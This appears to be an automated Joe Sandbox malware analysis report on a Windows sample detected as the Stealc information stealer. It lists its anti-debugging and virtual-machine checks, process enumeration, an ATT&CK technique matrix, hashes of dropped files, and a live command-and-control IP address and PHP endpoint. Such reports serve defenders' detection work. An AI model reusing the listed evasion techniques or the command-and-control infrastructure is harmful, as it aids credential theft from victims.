                      Source: Amcache.hve.4.drBinary or memory string: VMware PCI VMCI Bus Device
                      Source: Amcache.hve.4.drBinary or memory string: VMware VMCI Bus Device
                      Source: Amcache.hve.4.drBinary or memory string: VMware Virtual RAM
                      Source: Amcache.hve.4.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                      Source: Amcache.hve.4.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                      Source: C:\Users\user\Desktop\ttFpxuMwKz.exeAPI call chain: ExitProcess graph end nodegraph_0-26342
                      Source: C:\Users\user\Desktop\ttFpxuMwKz.exeAPI call chain: ExitProcess graph end nodegraph_0-26345
                      Source: C:\Users\user\Desktop\ttFpxuMwKz.exeAPI call chain: ExitProcess graph end nodegraph_0-26184
                      Source: C:\Users\user\Desktop\ttFpxuMwKz.exeAPI call chain: ExitProcess graph end nodegraph_0-26385
                      Source: C:\Users\user\Desktop\ttFpxuMwKz.exeAPI call chain: ExitProcess graph end nodegraph_0-26356
                      Source: C:\Users\user\Desktop\ttFpxuMwKz.exeAPI call chain: ExitProcess graph end nodegraph_0-26364
                      Source: C:\Users\user\Desktop\ttFpxuMwKz.exeAPI call chain: ExitProcess graph end nodegraph_0-27696
                      Source: C:\Users\user\Desktop\ttFpxuMwKz.exeAPI call chain: ExitProcess graph end nodegraph_0-26229
                      Source: C:\Users\user\Desktop\ttFpxuMwKz.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\user\Desktop\ttFpxuMwKz.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\user\Desktop\ttFpxuMwKz.exeCode function: 0_2_004045C0 lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,GetProcessHeap,RtlAllocateHeap,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,LdrInitializeThunk,lstrlenA,strlen,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,VirtualProtect,0_2_004045C0
                      Source: C:\Users\user\Desktop\ttFpxuMwKz.exeCode function: 0_2_0041AD48 memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0041AD48
                      Source: C:\Users\user\Desktop\ttFpxuMwKz.exeCode function: 0_2_004045C0 VirtualProtect ?,00000004,00000100,000000000_2_004045C0
                      Source: C:\Users\user\Desktop\ttFpxuMwKz.exeCode function: 0_2_00419860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00419860
                      Source: C:\Users\user\Desktop\ttFpxuMwKz.exeCode function: 0_2_00419750 mov eax, dword ptr fs:[00000030h]0_2_00419750
                      Source: C:\Users\user\Desktop\ttFpxuMwKz.exeCode function: 0_2_007E092B mov eax, dword ptr fs:[00000030h]0_2_007E092B
                      Source: C:\Users\user\Desktop\ttFpxuMwKz.exeCode function: 0_2_007F99B7 mov eax, dword ptr fs:[00000030h]0_2_007F99B7
                      Source: C:\Users\user\Desktop\ttFpxuMwKz.exeCode function: 0_2_007E0D90 mov eax, dword ptr fs:[00000030h]0_2_007E0D90
                      Source: C:\Users\user\Desktop\ttFpxuMwKz.exeCode function: 0_2_009E98AB push dword ptr fs:[00000030h]0_2_009E98AB
                      Source: C:\Users\user\Desktop\ttFpxuMwKz.exeCode function: 0_2_00417850 GetProcessHeap,HeapAlloc,GetUserNameA,0_2_00417850
                      Source: C:\Users\user\Desktop\ttFpxuMwKz.exeCode function: 0_2_0041AD48 memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0041AD48
                      Source: C:\Users\user\Desktop\ttFpxuMwKz.exeCode function: 0_2_0041CEEA SetUnhandledExceptionFilter,0_2_0041CEEA
                      Source: C:\Users\user\Desktop\ttFpxuMwKz.exeCode function: 0_2_0041B33A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0041B33A
                      Source: C:\Users\user\Desktop\ttFpxuMwKz.exeCode function: 0_2_007FD151 SetUnhandledExceptionFilter,0_2_007FD151
                      Source: C:\Users\user\Desktop\ttFpxuMwKz.exeCode function: 0_2_007FB5A1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_007FB5A1
                      Source: C:\Users\user\Desktop\ttFpxuMwKz.exeCode function: 0_2_007FAFAF memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_007FAFAF
                      Source: C:\Users\user\Desktop\ttFpxuMwKz.exeMemory protected: page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Yara detected Powershell download and execute
                      Source: Yara matchFile source: Process Memory Space: ttFpxuMwKz.exe PID: 6480, type: MEMORYSTR
                      Searches for specific processes (likely to inject)
                      Source: C:\Users\user\Desktop\ttFpxuMwKz.exeCode function: 0_2_00419600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00419600
                      Source: C:\Users\user\Desktop\ttFpxuMwKz.exeCode function: 0_2_007F9867 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_007F9867
                      Source: C:\Users\user\Desktop\ttFpxuMwKz.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_00417B90
                      Source: C:\Users\user\Desktop\ttFpxuMwKz.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_007F7DF7
                      Source: C:\Users\user\Desktop\ttFpxuMwKz.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\ttFpxuMwKz.exeCode function: 0_2_00416920 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess,0_2_00416920
                      Source: C:\Users\user\Desktop\ttFpxuMwKz.exeCode function: 0_2_00417850 GetProcessHeap,HeapAlloc,GetUserNameA,0_2_00417850
                      Source: C:\Users\user\Desktop\ttFpxuMwKz.exeCode function: 0_2_00417A30 GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA,0_2_00417A30
                      Source: Amcache.hve.4.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                      Source: Amcache.hve.4.drBinary or memory string: msmpeng.exe
                      Source: Amcache.hve.4.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                      Source: Amcache.hve.4.drBinary or memory string: MsMpEng.exe

                      Stealing of Sensitive Information

                      barindex
                      Yara detected Stealc
                      Source: Yara matchFile source: 0.3.ttFpxuMwKz.exe.970000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.ttFpxuMwKz.exe.970000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.ttFpxuMwKz.exe.7e0e67.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.ttFpxuMwKz.exe.400000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.ttFpxuMwKz.exe.7e0e67.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.ttFpxuMwKz.exe.400000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.2312364166.0000000000A13000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2312038691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.2072891062.0000000000970000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2312211700.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: ttFpxuMwKz.exe PID: 6480, type: MEMORYSTR
                      Source: Yara matchFile source: dump.pcap, type: PCAP

                      Remote Access Functionality

                      barindex
                      Yara detected Stealc
                      Source: Yara matchFile source: 0.3.ttFpxuMwKz.exe.970000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.ttFpxuMwKz.exe.970000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.ttFpxuMwKz.exe.7e0e67.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.ttFpxuMwKz.exe.400000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.ttFpxuMwKz.exe.7e0e67.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.ttFpxuMwKz.exe.400000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.2312364166.0000000000A13000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2312038691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.2072891062.0000000000970000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2312211700.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: ttFpxuMwKz.exe PID: 6480, type: MEMORYSTR
                      Source: Yara matchFile source: dump.pcap, type: PCAP

                      Mitre Att&ck Matrix

                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity InformationAcquire InfrastructureValid Accounts12
                      Native API                      		1
                      DLL Side-Loading                      		11
                      Process Injection                      		1
                      Masquerading                      		OS Credential Dumping2
                      System Time Discovery                      		Remote ServicesData from Local System1
                      Encrypted Channel                      		Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                      DLL Side-Loading                      		11
                      Virtualization/Sandbox Evasion                      		LSASS Memory41
                      Security Software Discovery                      		Remote Desktop ProtocolData from Removable Media2
                      Ingress Tool Transfer                      		Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
                      Disable or Modify Tools                      		Security Account Manager11
                      Virtualization/Sandbox Evasion                      		SMB/Windows Admin SharesData from Network Shared Drive2
                      Non-Application Layer Protocol                      		Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                      Process Injection                      		NTDS11
                      Process Discovery                      		Distributed Component Object ModelInput Capture12
                      Application Layer Protocol                      		Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                      Deobfuscate/Decode Files or Information                      		LSA Secrets1
                      Account Discovery                      		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
                      Obfuscated Files or Information                      		Cached Domain Credentials1
                      System Owner/User Discovery                      		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items22
                      Software Packing                      		DCSync1
                      File and Directory Discovery                      		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                      DLL Side-Loading                      		Proc Filesystem123
                      System Information Discovery                      		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      ttFpxuMwKz.exe100%Joe Sandbox ML

                      Dropped Files

                      No Antivirus matches

                      Unpacked PE Files

                      No Antivirus matches

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      http://upx.sf.net0%URL Reputationsafe

                      Domains and IPs

                      Contacted Domains

                      No contacted domains info

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      http://62.122.184.144/true
                        		unknown
                        http://62.122.184.144/f88d87a7e087e100.phptrue
                          		unknown

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          http://62.122.184.144/f88d87a7e087e100.php)ttFpxuMwKz.exe, 00000000.00000002.2312364166.0000000000A69000.00000004.00000020.00020000.00000000.sdmpfalse
                            		unknown
                            http://62.122.184.144/f88d87a7e087e100.phpjkttFpxuMwKz.exe, 00000000.00000002.2312364166.0000000000A51000.00000004.00000020.00020000.00000000.sdmpfalse
                              		unknown
                              http://62.122.184.144/f88d87a7e087e100.phprkJttFpxuMwKz.exe, 00000000.00000002.2312364166.0000000000A51000.00000004.00000020.00020000.00000000.sdmpfalse
                                		unknown
                                http://upx.sf.netAmcache.hve.4.drfalse
                                • URL Reputation: safe
                                		unknown
                                http://62.122.184.144ttFpxuMwKz.exe, 00000000.00000002.2312303114.00000000009DE000.00000004.00000020.00020000.00000000.sdmp, ttFpxuMwKz.exe, 00000000.00000002.2312364166.0000000000A13000.00000004.00000020.00020000.00000000.sdmptrue
                                  		unknown

                                  World Map of Contacted IPs

                                  • No. of IPs < 25%
                                  • 25% < No. of IPs < 50%
                                  • 50% < No. of IPs < 75%
                                  • 75% < No. of IPs

                                  Public IPs

                                  IPDomainCountryFlagASNASN NameMalicious
                                  62.122.184.144
                                  		unknownunknown
                                  		49120GORSET-ASRUtrue

                                  General Information

                                  Joe Sandbox version:41.0.0 Charoite
                                  Analysis ID:1528814
                                  Start date and time:2024-10-08 10:17:25 +02:00
                                  Joe Sandbox product:CloudBasic
                                  Overall analysis duration:0h 5m 16s
                                  Hypervisor based Inspection enabled:false
                                  Report type:full
                                  Cookbook file name:default.jbs
                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                  Number of analysed new started processes analysed:22
                                  Number of new started drivers analysed:0
                                  Number of existing processes analysed:0
                                  Number of existing drivers analysed:0
                                  Number of injected processes analysed:0
                                  Technologies:
                                  • HCA enabled
                                  • EGA enabled
                                  • AMSI enabled
                                  Analysis Mode:default
                                  Analysis stop reason:Timeout
                                  Sample name:ttFpxuMwKz.exe
                                  renamed because original name is a hash value
                                  Original Sample Name:56f2a1223362b66cca9bf86b7cacad0c.exe
                                  Detection:MAL
                                  Classification:mal100.troj.evad.winEXE@9/33@0/1
                                  EGA Information:
                                  • Successful, ratio: 100%
                                  HCA Information:
                                  • Successful, ratio: 100%
                                  • Number of executed functions: 23
                                  • Number of non-executed functions: 166
                                  Cookbook Comments:
                                  • Found application associated with file extension: .exe

                                  Warnings

                                  • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                  • Excluded IPs from analysis (whitelisted): 20.42.73.29
                                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, otelrules.azureedge.net, blobcollector.events.data.trafficmanager.net, onedsblobprdeus15.eastus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                  • VT rate limit hit for: ttFpxuMwKz.exe

                                  Simulations

                                  Behavior and APIs

                                  TimeTypeDescription
                                  04:18:43API Interceptor1x Sleep call for process: WerFault.exe modified

                                  Joe Sandbox View / Context

                                  IPs

                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  62.122.184.144gMkw55jZRs.exeGet hashmaliciousStealcBrowse
                                  • 62.122.184.144/f88d87a7e087e100.php
                                  QmMKz5d4j7.exeGet hashmaliciousStealcBrowse
                                  • 62.122.184.144/f88d87a7e087e100.php
                                  c95eb189cffef0c6b222d31de3c7ed0f9cabad48a38aa.exeGet hashmaliciousStealc, VidarBrowse
                                  • 62.122.184.144/f88d87a7e087e100.php

                                  Domains

                                  No context

                                  ASNs

                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  GORSET-ASRUgMkw55jZRs.exeGet hashmaliciousStealcBrowse
                                  • 62.122.184.144
                                  QmMKz5d4j7.exeGet hashmaliciousStealcBrowse
                                  • 62.122.184.144
                                  c95eb189cffef0c6b222d31de3c7ed0f9cabad48a38aa.exeGet hashmaliciousStealc, VidarBrowse
                                  • 62.122.184.144
                                  1.exeGet hashmaliciousRedLineBrowse
                                  • 62.122.184.51
                                  zJO55iLN3G.elfGet hashmaliciousUnknownBrowse
                                  • 31.40.39.14
                                  4VOPmuZZVV.exeGet hashmaliciousGoBrutBrowse
                                  • 62.122.184.95
                                  0Rae7oghna.elfGet hashmaliciousMiraiBrowse
                                  • 46.173.48.47
                                  PIyT9A3jfC.exeGet hashmaliciousPushdoBrowse
                                  • 62.122.190.121
                                  eQcKjYOV30.exeGet hashmaliciousPushdoBrowse
                                  • 62.122.190.121
                                  1EsDtA4mep.exeGet hashmaliciousPushdoBrowse
                                  • 62.122.190.121

                                  JA3 Fingerprints

                                  No context

                                  Dropped Files

                                  No context

                                  Created / dropped Files

                                  C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_ttFpxuMwKz.exe_915f25eb68eec9ac2c3e9f2b62465db9377348b_c40db49f_ca88670a-84c1-47f5-b406-ee02739b44b4\Report.wer

                                  Download File
                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):65536
                                  Entropy (8bit):0.9562751908421465
                                  Encrypted:false
                                  SSDEEP:192:ir6jRpnBs0BC2V2juSZr+dQzuiFfZ24IO8L:ljRpRBjV2jOyzuiFfY4IO8L
                                  MD5:8316182406DFFF1ECBE6581D91A570DE
                                  SHA1:992E7038CB6AC928C6E37CBCD3C4A4C22828DB93
                                  SHA-256:9C4EEFA59F681BBB23830AAC7597D451623F0FEB68234EDD96E52F644BAC7106
                                  SHA-512:052617CD26D2BB88E92B5416C4B61A32DB12C9943427D07517B5D9D547D2AD810C76C1AD5B4D9A1B06657DA77B9088A1E417BC7FB6AAB48ABF32742DFD90127F
                                  Malicious:true
                                  Reputation:low
                                  Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.2.8.4.9.1.0.8.2.7.1.0.2.0.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.2.8.4.9.1.0.9.1.6.1.6.4.5.4.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.a.8.8.6.7.0.a.-.8.4.c.1.-.4.7.f.5.-.b.4.0.6.-.e.e.0.2.7.3.9.b.4.4.b.4.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.c.8.b.b.3.f.9.-.e.2.5.3.-.4.4.c.6.-.a.0.6.3.-.8.9.2.7.1.7.7.d.9.a.f.7.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.t.t.F.p.x.u.M.w.K.z...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.9.5.0.-.0.0.0.1.-.0.0.1.4.-.b.e.0.1.-.e.d.9.f.5.a.1.9.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.6.a.1.b.8.3.3.9.c.4.f.d.e.2.5.d.7.9.f.9.7.1.1.f.5.5.9.b.5.2.8.1.0.0.0.0.f.f.f.f.!.0.0.0.0.4.8.4.6.9.9.f.e.4.e.c.d.e.2.9.d.a.1.c.5.c.7.3.8.9.2.8.8.1.c.e.a.2.f.9.8.e.b.8.a.!.t.t.F.p.x.u.M.w.K.z...e.x.e.....T.a.r.g.e.t.A.p.p.

                                  C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_ttFpxuMwKz.exe_e342d3f8e7937e4f5791c4c6cfa5b7779f350_c40db49f_0e7c3044-30f6-478d-90a2-6b3fe113c2cf\Report.wer

                                  Download File
                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):65536
                                  Entropy (8bit):0.88881725000696
                                  Encrypted:false
                                  SSDEEP:192:OC6jRgns056rgjuSZr+3zuiFfZ24IO8+:OfjRgn56rgjO3zuiFfY4IO8+
                                  MD5:2D3B75B2F592A03C5D238F625CBB78E5
                                  SHA1:D179621A666B7D23A42E5F41570994584A725E87
                                  SHA-256:9E97A65D24F4D4A54C71DCB60153957D93669FB2908E191B694538A3357BC4BB
                                  SHA-512:AE4B20DCCE87C0D60EBD7A33EFC752C85683E6ABB90A5368F58098CEBF0082FE5F4B3CD603751A6C1F2AEF7499C726320C2769D0A6CF10CBB8247B8193DC3597
                                  Malicious:true
                                  Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.2.8.4.9.1.0.3.7.4.7.3.7.7.1.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.e.7.c.3.0.4.4.-.3.0.f.6.-.4.7.8.d.-.9.0.a.2.-.6.b.3.f.e.1.1.3.c.2.c.f.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.4.e.6.a.4.1.f.-.d.c.4.4.-.4.9.f.0.-.9.3.0.0.-.1.b.6.6.b.2.3.4.1.9.6.8.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.t.t.F.p.x.u.M.w.K.z...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.9.5.0.-.0.0.0.1.-.0.0.1.4.-.b.e.0.1.-.e.d.9.f.5.a.1.9.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.6.a.1.b.8.3.3.9.c.4.f.d.e.2.5.d.7.9.f.9.7.1.1.f.5.5.9.b.5.2.8.1.0.0.0.0.f.f.f.f.!.0.0.0.0.4.8.4.6.9.9.f.e.4.e.c.d.e.2.9.d.a.1.c.5.c.7.3.8.9.2.8.8.1.c.e.a.2.f.9.8.e.b.8.a.!.t.t.F.p.x.u.M.w.K.z...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.1.0././.0.7.:.1.0.:.5.4.:.0.7.!.0.!.t.t.F.p.x.u.M.w.K.z...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.

                                  C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_ttFpxuMwKz.exe_e342d3f8e7937e4f5791c4c6cfa5b7779f350_c40db49f_1c7a17a4-e540-49db-952e-780584fee207\Report.wer

                                  Download File
                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):65536
                                  Entropy (8bit):0.9575940661204756
                                  Encrypted:false
                                  SSDEEP:192:hIt6jRcans056rgjuSZr+dQzuiFfZ24IO8+:h3jRpn56rgjOyzuiFfY4IO8+
                                  MD5:83302632A215D216B9216865169B178F
                                  SHA1:3DB9D8D58C9042957AABEE9205C73DB667220976
                                  SHA-256:E0DBAE8A1446FE37AE77311479A0C2F2C62EFC7190C168069D852A2D4577B7D0
                                  SHA-512:D880BE3AF8598CF2ABFD180D737E797A2A0C952F106CC244B772A16BE4C7693155D16EB93E57C16B46D23E4376D0DB3383CBEEA43C83020F496BDB94A35E9022
                                  Malicious:true
                                  Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.2.8.4.9.1.0.6.4.8.4.2.9.4.5.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.c.7.a.1.7.a.4.-.e.5.4.0.-.4.9.d.b.-.9.5.2.e.-.7.8.0.5.8.4.f.e.e.2.0.7.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.e.9.1.2.e.c.d.-.3.0.f.a.-.4.a.b.f.-.8.b.a.3.-.a.2.8.7.b.8.2.0.0.c.f.0.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.t.t.F.p.x.u.M.w.K.z...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.9.5.0.-.0.0.0.1.-.0.0.1.4.-.b.e.0.1.-.e.d.9.f.5.a.1.9.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.6.a.1.b.8.3.3.9.c.4.f.d.e.2.5.d.7.9.f.9.7.1.1.f.5.5.9.b.5.2.8.1.0.0.0.0.f.f.f.f.!.0.0.0.0.4.8.4.6.9.9.f.e.4.e.c.d.e.2.9.d.a.1.c.5.c.7.3.8.9.2.8.8.1.c.e.a.2.f.9.8.e.b.8.a.!.t.t.F.p.x.u.M.w.K.z...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.1.0././.0.7.:.1.0.:.5.4.:.0.7.!.0.!.t.t.F.p.x.u.M.w.K.z...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.

                                  C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_ttFpxuMwKz.exe_e342d3f8e7937e4f5791c4c6cfa5b7779f350_c40db49f_3aa0a4e2-4764-491a-9c64-93006a4c5c8e\Report.wer

                                  Download File
                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):65536
                                  Entropy (8bit):0.9107765244604166
                                  Encrypted:false
                                  SSDEEP:192:E6jRJns056rgjuSZr+duzuiFfZ24IO8+:5jRJn56rgjO8zuiFfY4IO8+
                                  MD5:AE99F24EBD4CFABF4BDBC63739CB562D
                                  SHA1:7DFDFBDDB8D26D5179361202A693AEAE8DCE6D67
                                  SHA-256:D48F31A1D0605FDBF22C898DAC6F1B39332C056C00CCA2A4E0E3DFCA79386894
                                  SHA-512:F98852B26DFDA3BF25581708222A90D12BA3EBB4DE64D8624338C75F2C854A45FC8B2CC2FD41F0147AA530FB5878D039A8FD274320CC12D2A17D66B9AED35C00
                                  Malicious:true
